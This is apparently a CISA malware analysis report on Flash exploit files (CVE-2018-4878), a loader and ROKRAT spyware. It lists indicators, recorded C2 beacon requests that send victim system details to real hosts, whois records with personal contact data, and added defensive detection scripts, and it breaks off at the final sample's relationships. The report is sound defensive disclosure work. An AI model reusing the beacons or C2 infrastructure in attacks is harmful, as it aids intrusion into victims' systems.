Analysis Report

MAR-10160323-1.v2

Last Revised: May 12, 2020
Alert Code: AR20-133D

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

The CISA Code & Media Analysis team received three artifacts for analysis; together with the files extracted from them, this report covers five files. The first artifact is a malicious Microsoft Word document that contains an embedded Shockwave Flash (SWF) application file. This embedded SWF file attempts to exploit the vulnerability detailed in CVE-2018-4878; a second, standalone SWF file that exploits the same vulnerability is also covered. Each SWF file, when executed, contacts a hard-coded server (www.korea-tax.info and www.1588-2040.co.kr, respectively) over HTTP, reporting the victim's Flash Player and operating system versions. The second artifact is a loader that decodes an embedded resource named "JOK" and injects it into the Windows application "Wscript.exe." This embedded resource contains an encoded variant of the malware known as ROKRAT. The third file in this report is the ROKRAT variant itself, which was extracted from the loader during analysis; its strings show that it is built to use the Box, Dropbox, pCloud, and Yandex cloud-storage APIs.

For a downloadable copy of IOCs, see MAR-10160323-1.v2.stix.

Submitted Files (5)

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c (3f98c434d7b39de61a8b459180dd46...)

851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a (aa525af1589156fc09f78e69b3b034...)

e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd (d2881e56e66aeaebef7efaa60a58ef...)

e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573 (5c6c1ed910e7c9740a0289a6d27890...)

fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0 (111d205422fe90848c2f41cc84ebd9...)

Domains (2)

www.1588-2040.co.kr

www.korea-tax.info

Findings

3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c

Tags

CVE-2018-4878, trojan

Details
Name 3f98c434d7b39de61a8b459180dd46a3
Size 121344 bytes
Type Composite Document File V2 Document, Cannot read section info
MD5 3f98c434d7b39de61a8b459180dd46a3
SHA1 1584b3ce64835a3c7b796139fbd981a9f2cddb6c
SHA256 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
SHA512 27643afc00fda2dd8b447af1e6950d65fe5b4dd91a8eb022fef68694126efe41fd8895a6c065c261507bb526668c27f4bc055ac58c592d43cf760c32e365be2d
ssdeep 1536:+dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9n:u1FLNEfBj2NSRvZQnEDtShuA3H9yW
Entropy 7.947501
Antivirus
Ahnlab SWF/Agent
Antiy Trojan[Exploit]/SWF.CVE-2018-4878
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Exploit.Agent.MS
ClamAV Swf.Trojan.Rokrat-6443186-0
Cyren Siwifi
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Exploit.Agent.MS (B)
Ikarus Trojan.SWF.Exploit
McAfee RDN/Generic Exploit.lv
Microsoft Security Essentials Exploit:SWF/Korpode.A
NetGate Exploit.Win32.Generic
Quick Heal Exp.OLE.CVE-2018-4878.C
Sophos Troj/SwfExp-OI
Symantec Trojan.Gen.NPE.2
TACHYON Trojan-Exploit/W97.Agent.Gen
TrendMicro TROJ_EX.F2A7C559
TrendMicro House Call TROJ_EX.F2A7C559
YARA Rules

No matches found.

ssdeep Matches
97 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1
97 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87
Relationships
3b1395f620... Contains 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
Description

This file is a malicious Microsoft Word document. It contains an embedded malicious Shockwave Flash (SWF) file (851b7b044c...) designed to exploit the vulnerability detailed in CVE-2018-4878. The high ssdeep similarity (97) between the document and the embedded SWF is consistent with the document being little more than a container for it.
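The first triage step on a document like this is to carve the embedded SWF out of the container so it can be hashed and decompiled on its own. The following script is an added example and is not CISA's tooling: it scans a byte blob for the three SWF signatures (FWS uncompressed, CWS zlib, ZWS LZMA), validates the header, inflates CWS bodies, and returns a normalized uncompressed copy. The miniature SWF it embeds for the demonstration is constructed here and is not one of the report's samples; SWF version 32 is used because that is the version reported for both SWF files in this report.

```python
"""Carve embedded Shockwave Flash (SWF) files out of an arbitrary byte blob.

Added example, not CISA's tooling. The demo SWF below is constructed, not a
sample from the report.
"""
from __future__ import annotations

import hashlib
import re
import struct
import zlib
from dataclasses import dataclass

# SWF header: 3-byte signature, 1-byte version, UI32 little-endian file length
# (the length of the *uncompressed* file, header included).
_SIG = re.compile(rb"[FCZ]WS")


@dataclass
class SwfHit:
    offset: int           # where the header starts in the scanned blob
    signature: bytes      # b"FWS", b"CWS" or b"ZWS"
    version: int          # SWF version byte (both report samples are version 32)
    declared_length: int  # uncompressed file length from the header
    data: bytes | None    # normalised FWS file; None for ZWS (not inflated here)

    @property
    def sha256(self) -> str | None:
        return hashlib.sha256(self.data).hexdigest() if self.data else None


def carve_swf(blob: bytes, max_version: int = 64) -> list[SwfHit]:
    """Return every plausible SWF found in blob, with CWS bodies inflated."""
    hits: list[SwfHit] = []
    for m in _SIG.finditer(blob):
        off = m.start()
        if off + 8 > len(blob):
            continue
        sig = m.group(0)
        version = blob[off + 3]
        (length,) = struct.unpack_from("<I", blob, off + 4)
        # Header sanity: a small version number and a length that covers
        # more than the 8-byte header itself.
        if not (1 <= version <= max_version) or length <= 8:
            continue
        body_len = length - 8
        if sig == b"FWS":
            if off + length > len(blob):
                continue
            body = blob[off + 8 : off + length]
        elif sig == b"CWS":
            d = zlib.decompressobj()
            try:
                body = d.decompress(blob[off + 8 :], body_len)
            except zlib.error:
                continue  # signature collision, not a zlib stream
            # A genuine CWS inflates to exactly the declared length.
            if len(body) != body_len:
                continue
        else:
            # ZWS is LZMA-compressed; record it and leave inflation to a Flash tool.
            hits.append(SwfHit(off, sig, version, length, None))
            continue
        norm = b"FWS" + bytes([version]) + struct.pack("<I", length) + body
        hits.append(SwfHit(off, sig, version, length, norm))
    return hits


def build_demo_swf(compress: bool, version: int = 32) -> bytes:
    """Constructed minimal SWF: 550x400 RECT, 12 fps, one frame, End tag."""
    body = (bytes.fromhex("7800055f00000fa000")  # RECT (frame size)
            + b"\x00\x0c"                          # frame rate 12.0 as 8.8 fixed
            + b"\x01\x00"                          # frame count
            + b"\x00\x00")                         # End tag
    header = bytes([version]) + struct.pack("<I", 8 + len(body))
    if compress:
        return b"CWS" + header + zlib.compress(body)
    return b"FWS" + header + body


if __name__ == "__main__":
    # Stand-in for a document container: padding, a CWS, a decoy signature, padding.
    blob = b"\x00" * 512 + build_demo_swf(True) + b"padCWS\x20garbage" + b"\xff" * 64
    for h in carve_swf(blob):
        print(f"{h.signature.decode()} v{h.version} at 0x{h.offset:x} "
              f"len={h.declared_length} sha256={h.sha256}")
```

Run it against the raw bytes of the document (or against each OLE stream if the container has been unpacked first); the decoy "CWS" in the demo shows why the zlib round-trip check matters, since the three-byte signature alone produces false hits in any large file.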

851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a

Tags

CVE-2018-4878, trojan

Details
Name aa525af1589156fc09f78e69b3b03428
Size 117864 bytes
Type Macromedia Flash data, version 32
MD5 aa525af1589156fc09f78e69b3b03428
SHA1 6ff889358923ab2a0de80303be9ac559a555b9b9
SHA256 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
SHA512 3a82f830bcf547c94a3b0e56ffa27330328b392a4d1356f7e62a28c18d2eb110507968a3f66e51e985ffceb3640885e5402623cf9ab987ae7a005cff2b1edd57
ssdeep 1536:4dVr1FoOLJEd4EQA9mVOkxN7ORzh9n98scLzA4QfwnEOCnnvlQXRhuA+0qwvxH9S:41FLNEfBj2NSRvZQnEDtShuA3H9yf
Entropy 7.987027
Antivirus
Ahnlab SWF/Cve-2018-4878.R.SS18
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Exploit.Agent.MS
ClamAV Win.Trojan.Agent-6551186-0
Cyren SWF/CVE-2018-4878.B!Camelot
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Exploit.Agent.MS (B)
Ikarus Trojan.SWF.Exploit
McAfee Exploit-CVE2018-4878.b
Microsoft Security Essentials Exploit:SWF/Korpode.A!gen
Quick Heal Exp.SWF.CVE-2018-4878.D
Sophos Troj/SwfExp-OK
Symantec Trojan.Gen.NPE.2
TACHYON Trojan-Exploit/SWF.Agent.Gen
YARA Rules

No matches found.

ssdeep Matches
97 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
99 6280a646ded60de151e1c8ad25f7756e2254f6cb5a7720e704589d692898f8e1
97 e3247251d459a89493a1494052ad11d8f8c2fd911acd7eedd5bfd78b6bd34c87
Relationships
851b7b044c... Contained_Within 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
851b7b044c... Connected_To www.korea-tax.info
Description

This file is the malicious Shockwave Flash (SWF) file embedded in the Microsoft Word document 3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c. When executed, it first requests /crossdomain.xml from the hard-coded command-and-control (C2) server "www.korea-tax.info" (the Flash Player cross-domain policy check) and then issues a GET to /main/local.php whose query string carries a long hexadecimal "id" value, the Flash Player version (fp_vs=WIN 18.0,0,209) and the operating system version (os_vs=Windows 7), as recorded in the HTTP sessions below.

www.korea-tax.info

Tags

command-and-control

URLs
  • www.korea-tax.info/crossdomain.xml
  • www.korea-tax.info/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
Ports
  • 80 TCP
HTTP Sessions
  • GET /crossdomain.xml HTTP/1.1

    Host: www.korea-tax.info

    Connection: keep-alive

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

    Accept: */*

    Accept-Encoding: gzip,deflate,sdch

    Accept-Language: en-US,en;q=0.8
  • GET /main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1

    Host: www.korea-tax.info

    Connection: keep-alive

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

    Accept: */*

    Accept-Encoding: gzip,deflate,sdch

    Accept-Language: en-US,en;q=0.8
Whois

Queried whois.afilias.info with "korea-tax.info"...



Domain Name: KOREA-TAX.INFO

Registry Domain ID: D503300000055962553-LRMS

Registrar WHOIS Server:

Registrar URL: http://www.PublicDomainRegistry.com

Updated Date: 2018-02-10T20:31:57Z

Creation Date: 2017-12-12T05:52:58Z

Registry Expiry Date: 2018-12-12T05:52:58Z

Registrar Registration Expiration Date:

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Registrar IANA ID: 303

Registrar Abuse Contact Email: abuse-contact@publicdomainregistry.com

Registrar Abuse Contact Phone: +1.2013775952

Reseller:

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Registry Registrant ID: C213778924-LRMS

Registrant Name: yang jieun

Registrant Organization: yang jieun

Registrant Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do

Registrant City: Kwangmyong

Registrant State/Province: Kyonggi-do

Registrant Postal Code: 14200

Registrant Country: KR

Registrant Phone: +82.1044612320

Registrant Phone Ext:

Registrant Fax:

Registrant Fax Ext:

Registrant Email: john.chapman91128@gmail.com

Registry Admin ID: C213778924-LRMS

Admin Name: yang jieun

Admin Organization: yang jieun

Admin Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do

Admin City: Kwangmyong

Admin State/Province: Kyonggi-do

Admin Postal Code: 14200

Admin Country: KR

Admin Phone: +82.1044612320

Admin Phone Ext:

Admin Fax:

Admin Fax Ext:

Admin Email: john.chapman91128@gmail.com

Registry Tech ID: C213778924-LRMS

Tech Name: yang jieun

Tech Organization: yang jieun

Tech Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do

Tech City: Kwangmyong

Tech State/Province: Kyonggi-do

Tech Postal Code: 14200

Tech Country: KR

Tech Phone: +82.1044612320

Tech Phone Ext:

Tech Fax:

Tech Fax Ext:

Tech Email: john.chapman91128@gmail.com

Registry Billing ID: C213778924-LRMS

Billing Name: yang jieun

Billing Organization: yang jieun

Billing Street: 25-11 Wongwangmyeongan-ro Gwangmyeong-si Gyeonggi-do

Billing City: Kwangmyong

Billing State/Province: Kyonggi-do

Billing Postal Code: 14200

Billing Country: KR

Billing Phone: +82.1044612320

Billing Phone Ext:

Billing Fax:

Billing Fax Ext:

Billing Email: john.chapman91128@gmail.com

Name Server: NS3.HOSTINGER.COM

Name Server: NS4.HOSTINGER.COM

Name Server: NS1.HOSTINGER.COM

Name Server: NS2.HOSTINGER.COM

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

Relationships
www.korea-tax.info Connected_From 851b7b044cbcaa67350aff80a5b9fb4c63393957f3d4b30005a83348fe69ac5a
Description

Identified malicious C2 Server.

fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0

Tags

CVE-2018-4878, trojan

Details
Name 111d205422fe90848c2f41cc84ebd96a
Size 117338 bytes
Type Macromedia Flash data, version 32
MD5 111d205422fe90848c2f41cc84ebd96a
SHA1 b03f6f336c07d514edb15d6e3fefd98432cae7e2
SHA256 fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
SHA512 a8e7db77fd6f27ae8ca18be8ed644df3443d17b048fc6baf1b7496da2810b014e19a35e9502de252ad65cf4feb07ccba53aeb567ad62d897231c1a3b17d619b5
ssdeep 3072:BebZ1dssmUo7VUthHkNEVVKJ6ydYBpb2N4r1Je:sbZfssAGoQymsgM
Entropy 7.983610
Antivirus
Ahnlab SWF/Cve-2018-4878.R.SS18
Antiy Trojan[Exploit]/SWF.CVE-2018-4878
Avira EXP/CVE-2018-4878.A.Gen
BitDefender Script.SWF.C589
ClamAV Swf.Trojan.Rokrat-6443186-0
Cyren SWF/CVE-2018-4878.B!Camelot
ESET SWF/Exploit.CVE-2018-4878.A trojan
Emsisoft Script.SWF.C589 (B)
Ikarus Trojan.SWF.Exploit
McAfee Exploit-CVE2018-4878.b
Microsoft Security Essentials Exploit:SWF/Korpode.A!gen
NANOAV Exploit.Swf.CVE20184878.exmycd
Quick Heal Exp.SWF.CVE-2018-4878.D
Sophos Troj/SWFExp-OL
Symantec Trojan.Gen.2
TACHYON Trojan-Exploit/SWF.Agent.Gen
TrendMicro SWF_EXP.3A46FD51
TrendMicro House Call SWF_EXP.3A46FD51
YARA Rules

No matches found.

ssdeep Matches
99 3004196da6055c6f062c94a9aae8dc357fa19b953b071049083e69e840083cf9
Relationships
fec71b8479... Connected_To www.1588-2040.co.kr
Description

This file is a malicious Shockwave Flash (SWF) file designed to exploit the vulnerability detailed in CVE-2018-4878. When executed, it attempts to connect to the hard-coded command-and-control (C2) server "www.1588-2040.co.kr" with the same two-step pattern as the SWF above: a request for /crossdomain.xml followed by a GET to /design/m/images/image/image.php carrying a hexadecimal "id" value plus the Flash Player version (fp_vs=WIN 18.0,0,209) and operating system version (os_vs=Windows 7).

www.1588-2040.co.kr

Tags

command-and-control

URLs
  • www.1588-2040.co.kr/crossdomain.xml
  • www.1588-2040.co.kr/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
Ports
  • 80 TCP
HTTP Sessions
  • GET /crossdomain.xml HTTP/1.1

    Host: www.1588-2040.co.kr

    Connection: keep-alive

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

    Accept: */*

    Accept-Encoding: gzip,deflate,sdch

    Accept-Language: en-US,en;q=0.8
  • GET /design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207 HTTP/1.1

    Host: www.1588-2040.co.kr

    Connection: keep-alive

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

    Accept: */*

    Accept-Encoding: gzip,deflate,sdch

    Accept-Language: en-US,en;q=0.8
Whois

Domain Name: 1588-2040.co.kr

Registrant: S.S. Moon

Registrant Address: 1303 manhatan b/d 36-2, Yeoeuido-dong Yeongdeungpo-gu Seoul Korea

Registrant Zip Code: 150749

Administrative Contact (AC): S.S. Moon

AC E-Mail: card15882040@nate.com

AC Phone Number: 02-2090-3500

Registered Date: 2009. 07. 03.

Last Updated Date: 2015. 07. 03.

Expiration Date: 2018. 07. 03.

Publishes: Y

Authorized Agency: Asadal, Inc. (http://www.asadal.co.kr)

DNSSEC: unsigned

Primary Name Server

Host Name: ns.epart.com

Secondary Name Server

Host Name: ns1.epart.com

Relationships
www.1588-2040.co.kr Connected_From fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
Description

Identified malicious C2 domain.
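Both SWF samples in this report beacon the same way: a GET for /crossdomain.xml (the Flash Player policy-file check) followed by a GET to a PHP endpoint whose query string carries a long hexadecimal "id" plus fp_vs=WIN 18.0,0,209 and os_vs=Windows 7. That shape is easier to hunt for in proxy logs than the two domains themselves, which will rotate. The script below is an added example, not part of the report: it parses proxy-style log lines, flags requests whose query matches the version-reporting pattern, and notes whether the same client fetched the policy file from the same host first. The log lines are constructed for the demonstration; only the two report domains and their URLs are real.

```python
"""Hunt for the CVE-2018-4878 SWF beacon pattern in proxy logs.

Added example, not part of the report. Log format and client addresses are
constructed; the two malicious URLs are the ones recorded in the report.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log, one request per line: "<client> <method> <url>".
SAMPLE_LOG = """\
10.0.0.5 GET http://www.korea-tax.info/crossdomain.xml
10.0.0.5 GET http://www.korea-tax.info/main/local.php?id=8B4D963B41003E407AC0022E40FCE01C1DA94EB8DEEF20939722ABBFE7F52B9C7DEA62EFDB0D82345AE24D366F9C7BDC2C8F5C460AE8BE18E59C1116489EC9F2EB5504617A4D6D74982D602624E94F32BB3864277E4967BD15B1E36AF4A98431DC76C4BB&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
10.0.0.7 GET http://www.example.com/crossdomain.xml
10.0.0.7 GET http://www.example.com/news.html?id=42
10.0.0.9 GET http://www.1588-2040.co.kr/design/m/images/image/image.php?id=2E4B4EE62772DB77094E0210546BEEBF2F669A2309009324807100E182FFDFEAB2CE91B00DFA993ACDE3A1198DC8BD9DAF98F449FB04FD8588D94693E08D3BC45F17C4ECDC040F138CC8916D2252478D3BE342D5FA1F6231EF6562053E5C1463FDCEEE82&fp_vs=WIN%2018.0,0,209&os_vs=Windows%207
"""

_HEX = set("0123456789abcdefABCDEF")


def is_flash_version_beacon(url: str, min_id_hex: int = 32) -> bool:
    """True when the query looks like the exploit's victim-profiling request:
    a long hex id, a Flash Player version string and a Windows version string."""
    q = parse_qs(urlsplit(url).query)          # parse_qs percent-decodes values
    ident = q.get("id", [""])[0]
    fp_vs = q.get("fp_vs", [""])[0]            # e.g. "WIN 18.0,0,209"
    os_vs = q.get("os_vs", [""])[0]            # e.g. "Windows 7"
    return (len(ident) >= min_id_hex and set(ident) <= _HEX
            and fp_vs.startswith("WIN ") and os_vs.startswith("Windows"))


def find_exploit_chains(log_text: str) -> list[dict]:
    """Return one record per beacon, noting whether the same client fetched
    /crossdomain.xml from the same host earlier in the log (corroborating,
    not required: the policy fetch is how Flash gates the cross-domain call)."""
    policy_seen: set[tuple[str, str]] = set()
    hits: list[dict] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, _method, url = line.split(maxsplit=2)
        parts = urlsplit(url)
        host = parts.hostname or ""
        if parts.path == "/crossdomain.xml":
            policy_seen.add((client, host))
        elif is_flash_version_beacon(url):
            hits.append({
                "client": client,
                "host": host,
                "url": url,
                "policy_seen": (client, host) in policy_seen,
                "flash_version": parse_qs(parts.query)["fp_vs"][0],
            })
    return hits


if __name__ == "__main__":
    for hit in find_exploit_chains(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['host']} flash={hit['flash_version']} "
              f"policy_first={hit['policy_seen']}")
```

The flash_version field is worth keeping in the alert: it tells the responder which Flash Player build the victim was running, which decides whether the exploit could have succeeded. The hard-coded User-Agent in the sessions above (Chrome/31.0.1650.63 with "sdch" in Accept-Encoding, far older than the Flash version it reports) is a further pivot, but version strings in that header are easy for the attacker to change, so the query-string shape is the more durable signal.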

e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd

Tags

backdoor, dropper, trojan

Details
Name d2881e56e66aeaebef7efaa60a58ef9b
Size 626688 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d2881e56e66aeaebef7efaa60a58ef9b
SHA1 c09c1be69e5a206bcfe3d726773f0b0ddecb3622
SHA256 e1546323dc746ed2f7a5c973dcecc79b014b68bdd8a6230239283b4f775f4bbd
SHA512 da6e40bcebc6161386142caa6c1e68faf7f520cc48cbb514d8029d65f9bb0cac14bde435eb584a998be9e379cc875b85719cc0d4ee9d0fed73b5c20cf7da7fe8
ssdeep 12288:cbeQy0+6dUlyAcdqfAkMvGpns9gKYLd+NjhzZkZf7:AfuJGv2ns9XRkZf
Entropy 7.866467
Antivirus
Ahnlab Trojan/Win32.Loader
Antiy Trojan/Win32.RockRat
Avira TR/Dropper.Gen
BitDefender Trojan.GenericKD.41796224
ClamAV Win.Trojan.Rokrat-6443187-0
Cyren W32/Trojan.IKOU-3732
ESET Win32/Spy.Agent.PHF trojan
Emsisoft Trojan.GenericKD.41796224 (B)
Filseclab Trojan.RockRat.gen.qzrl
Ikarus Trojan.Win32.Krypt
K7 Trojan ( 00525b861 )
McAfee Trojan-FPCM!D2881E56E66A
Microsoft Security Essentials Trojan:Win32/Korpode.A!dha
NANOAV Trojan.Win32.RockRat.exmijf
NetGate Trojan.Win32.Malware
Quick Heal Trojan.RockRat.S1875120
Sophos Mal/FakeAV-ST
Symantec Backdoor.Rokrat
Systweak trojan.korpode
TrendMicro Backdoo.3FA9A8A6
TrendMicro House Call Backdoo.3FA9A8A6
Vir.IT eXplorer Trojan.Win32.Spy.AST
VirusBlokAda Malware-Cryptor.Inject.gen
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
e1546323dc... Contains e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
Description

This file is a loader. It is designed to load and execute data contained within an embedded resource named "JOK" into the Windows application "Wscript.exe." The embedded "JOK" resource is approximately 522,848 bytes in size and contains executable code. The beginning portion of the data reveals the presence of a NOP sled (0x90, 0x90, 0x90, ...), which leads to a decoder stub. The decoder code decodes the embedded executable code within the Windows "Wscript.exe" process. The embedded executable code has been identified as ROKRAT (e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573).
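The sizes above bound the wrapper: the resource is roughly 522,848 bytes and the extracted ROKRAT image is 520,704 bytes, so about 2 KB of sled and decoder stub precede the payload. The script below is an added example, not CISA's code, showing the first-pass triage one would run on such a resource: measure the NOP sled, mark where the stub begins, and locate the embedded PE. The report does not describe the decoder's algorithm, so as a stand-in this demo assumes a single-byte XOR and recovers the key by demanding a consistent MZ/PE header pair (a cleartext PE is just the key-0 case); the resource bytes, including the few stand-in stub instructions, are constructed and are not the real "JOK" data.

```python
"""Triage a loader resource of the form: NOP sled, decoder stub, encoded PE.

Added example, not CISA's code. The single-byte XOR scheme is an assumption
for the demo; the report does not state how the real stub decodes its payload.
"""
from __future__ import annotations

import struct
from dataclasses import dataclass

NOP = 0x90


@dataclass
class Triage:
    sled_len: int            # number of leading 0x90 bytes
    stub_offset: int         # first byte after the sled (decoder stub)
    pe_offset: int | None    # offset of the recovered MZ header, if any
    xor_key: int | None      # 0 means the PE was in cleartext
    pe_image: bytes | None   # decoded bytes from the MZ header onward


def _xor(buf: bytes, key: int) -> bytes:
    return buf.translate(bytes(i ^ key for i in range(256)))


def _valid_pe(buf: bytes, off: int) -> bool:
    """MZ at off and e_lfanew (off+0x3C) pointing at a PE\\0\\0 signature."""
    if buf[off:off + 2] != b"MZ" or off + 0x40 > len(buf):
        return False
    (e_lfanew,) = struct.unpack_from("<I", buf, off + 0x3C)
    pe = off + e_lfanew
    return 0x40 <= e_lfanew <= 0x400 and buf[pe:pe + 4] == b"PE\x00\x00"


def triage_resource(res: bytes, max_scan: int = 4096) -> Triage:
    """Measure the sled, then look for a (possibly XOR-encoded) PE within
    max_scan bytes after it. Key 0 (cleartext) is tried first."""
    sled = 0
    while sled < len(res) and res[sled] == NOP:
        sled += 1
    region = res[sled:sled + max_scan + 0x440]  # room for a header starting anywhere in scan range
    for key in range(256):
        window = _xor(region, key)
        off = window.find(b"MZ")
        while 0 <= off < max_scan:
            if _valid_pe(window, off):
                return Triage(sled, sled, sled + off, key, _xor(res[sled + off:], key))
            off = window.find(b"MZ", off + 1)
    return Triage(sled, sled, None, None, None)


def build_demo_resource(key: int = 0x5A) -> bytes:
    """Constructed resource: 64-byte NOP sled, 14 bytes of stand-in stub
    (call $+5 / pop ebx / lea edi,[ebx+0x20] / mov ecx,0x5a), then an
    XOR-encoded minimal PE header."""
    stub = bytes.fromhex("e8000000005b8d7b20b95a000000")
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)     # e_lfanew
    hdr[0x40:0x44] = b"PE\x00\x00"
    struct.pack_into("<H", hdr, 0x44, 0x14C)    # IMAGE_FILE_MACHINE_I386
    return b"\x90" * 64 + stub + _xor(bytes(hdr), key)


if __name__ == "__main__":
    t = triage_resource(build_demo_resource())
    print(f"sled={t.sled_len} stub@{t.stub_offset} pe@{t.pe_offset} key={t.xor_key}")
```

If the key search finds nothing, the stub is doing more than a byte-wise XOR and the practical route is the one the report implies: let the loader run under a debugger and dump the decoded image from the Wscript.exe process, which is how the 520,704-byte ROKRAT file below was obtained.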



 

Screenshots

Figure 1 (image not reproduced in this text version)

e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573

Tags

spyware, trojan

Details
Name 5c6c1ed910e7c9740a0289a6d278908a
Size 520704 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5c6c1ed910e7c9740a0289a6d278908a
SHA1 0e46e026890982da526d8acf9f1ce6287451c9a6
SHA256 e200517ab9482e787a59e60accc8552bd0c844687cd0cf8ec4238ed2fc2fa573
SHA512 e2d3059e28998bfb5c0badf3d6d8df28e527037c33b489b7dcc2f392a1d91a568beef410a4feaabc4daee98112142e58394ed5e2a73c71ed0cb46943eb3383d1
ssdeep 6144:Wh65XKGJs5Ve5psLyYuwAKdf9Q4p9FCAkko7cmxBZAk4+AJ6P3VNUo+wABK7Cl/5:SAKdf+4p9J2x0k4+AQ3VNH+rZx7Aq9
Entropy 6.560851
Antivirus
Ahnlab Trojan/Win32.Hwdoor
Antiy Trojan[Spy]/Win32.Agent
Avira HEUR/AGEN.1133065
BitDefender Gen:Variant.Graftor.538484
ClamAV Win.Trojan.Rokrat-6380697-0
ESET a variant of Win32/Spy.Agent.PHF trojan
Emsisoft Gen:Variant.Graftor.538484 (B)
Ikarus Trojan-Spy.Agent
K7 Spyware ( 0051fbf81 )
Microsoft Security Essentials Trojan:Win32/Korpode.A!dha
NANOAV Trojan.Win32.Generic.evuabe
NetGate Trojan.Win32.Malware
Sophos Troj/Spy-AQO
Symantec Trojan.Gen.2
Systweak malware.gen-rg
TACHYON Trojan-Spy/W32.Agent.520704.E
TrendMicro TSPY_KO.89D03B8E
TrendMicro House Call TSPY_KO.89D03B8E
Vir.IT eXplorer Trojan.Win32.Spy.BUB
VirusBlokAda TrojanSpy.Agent
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
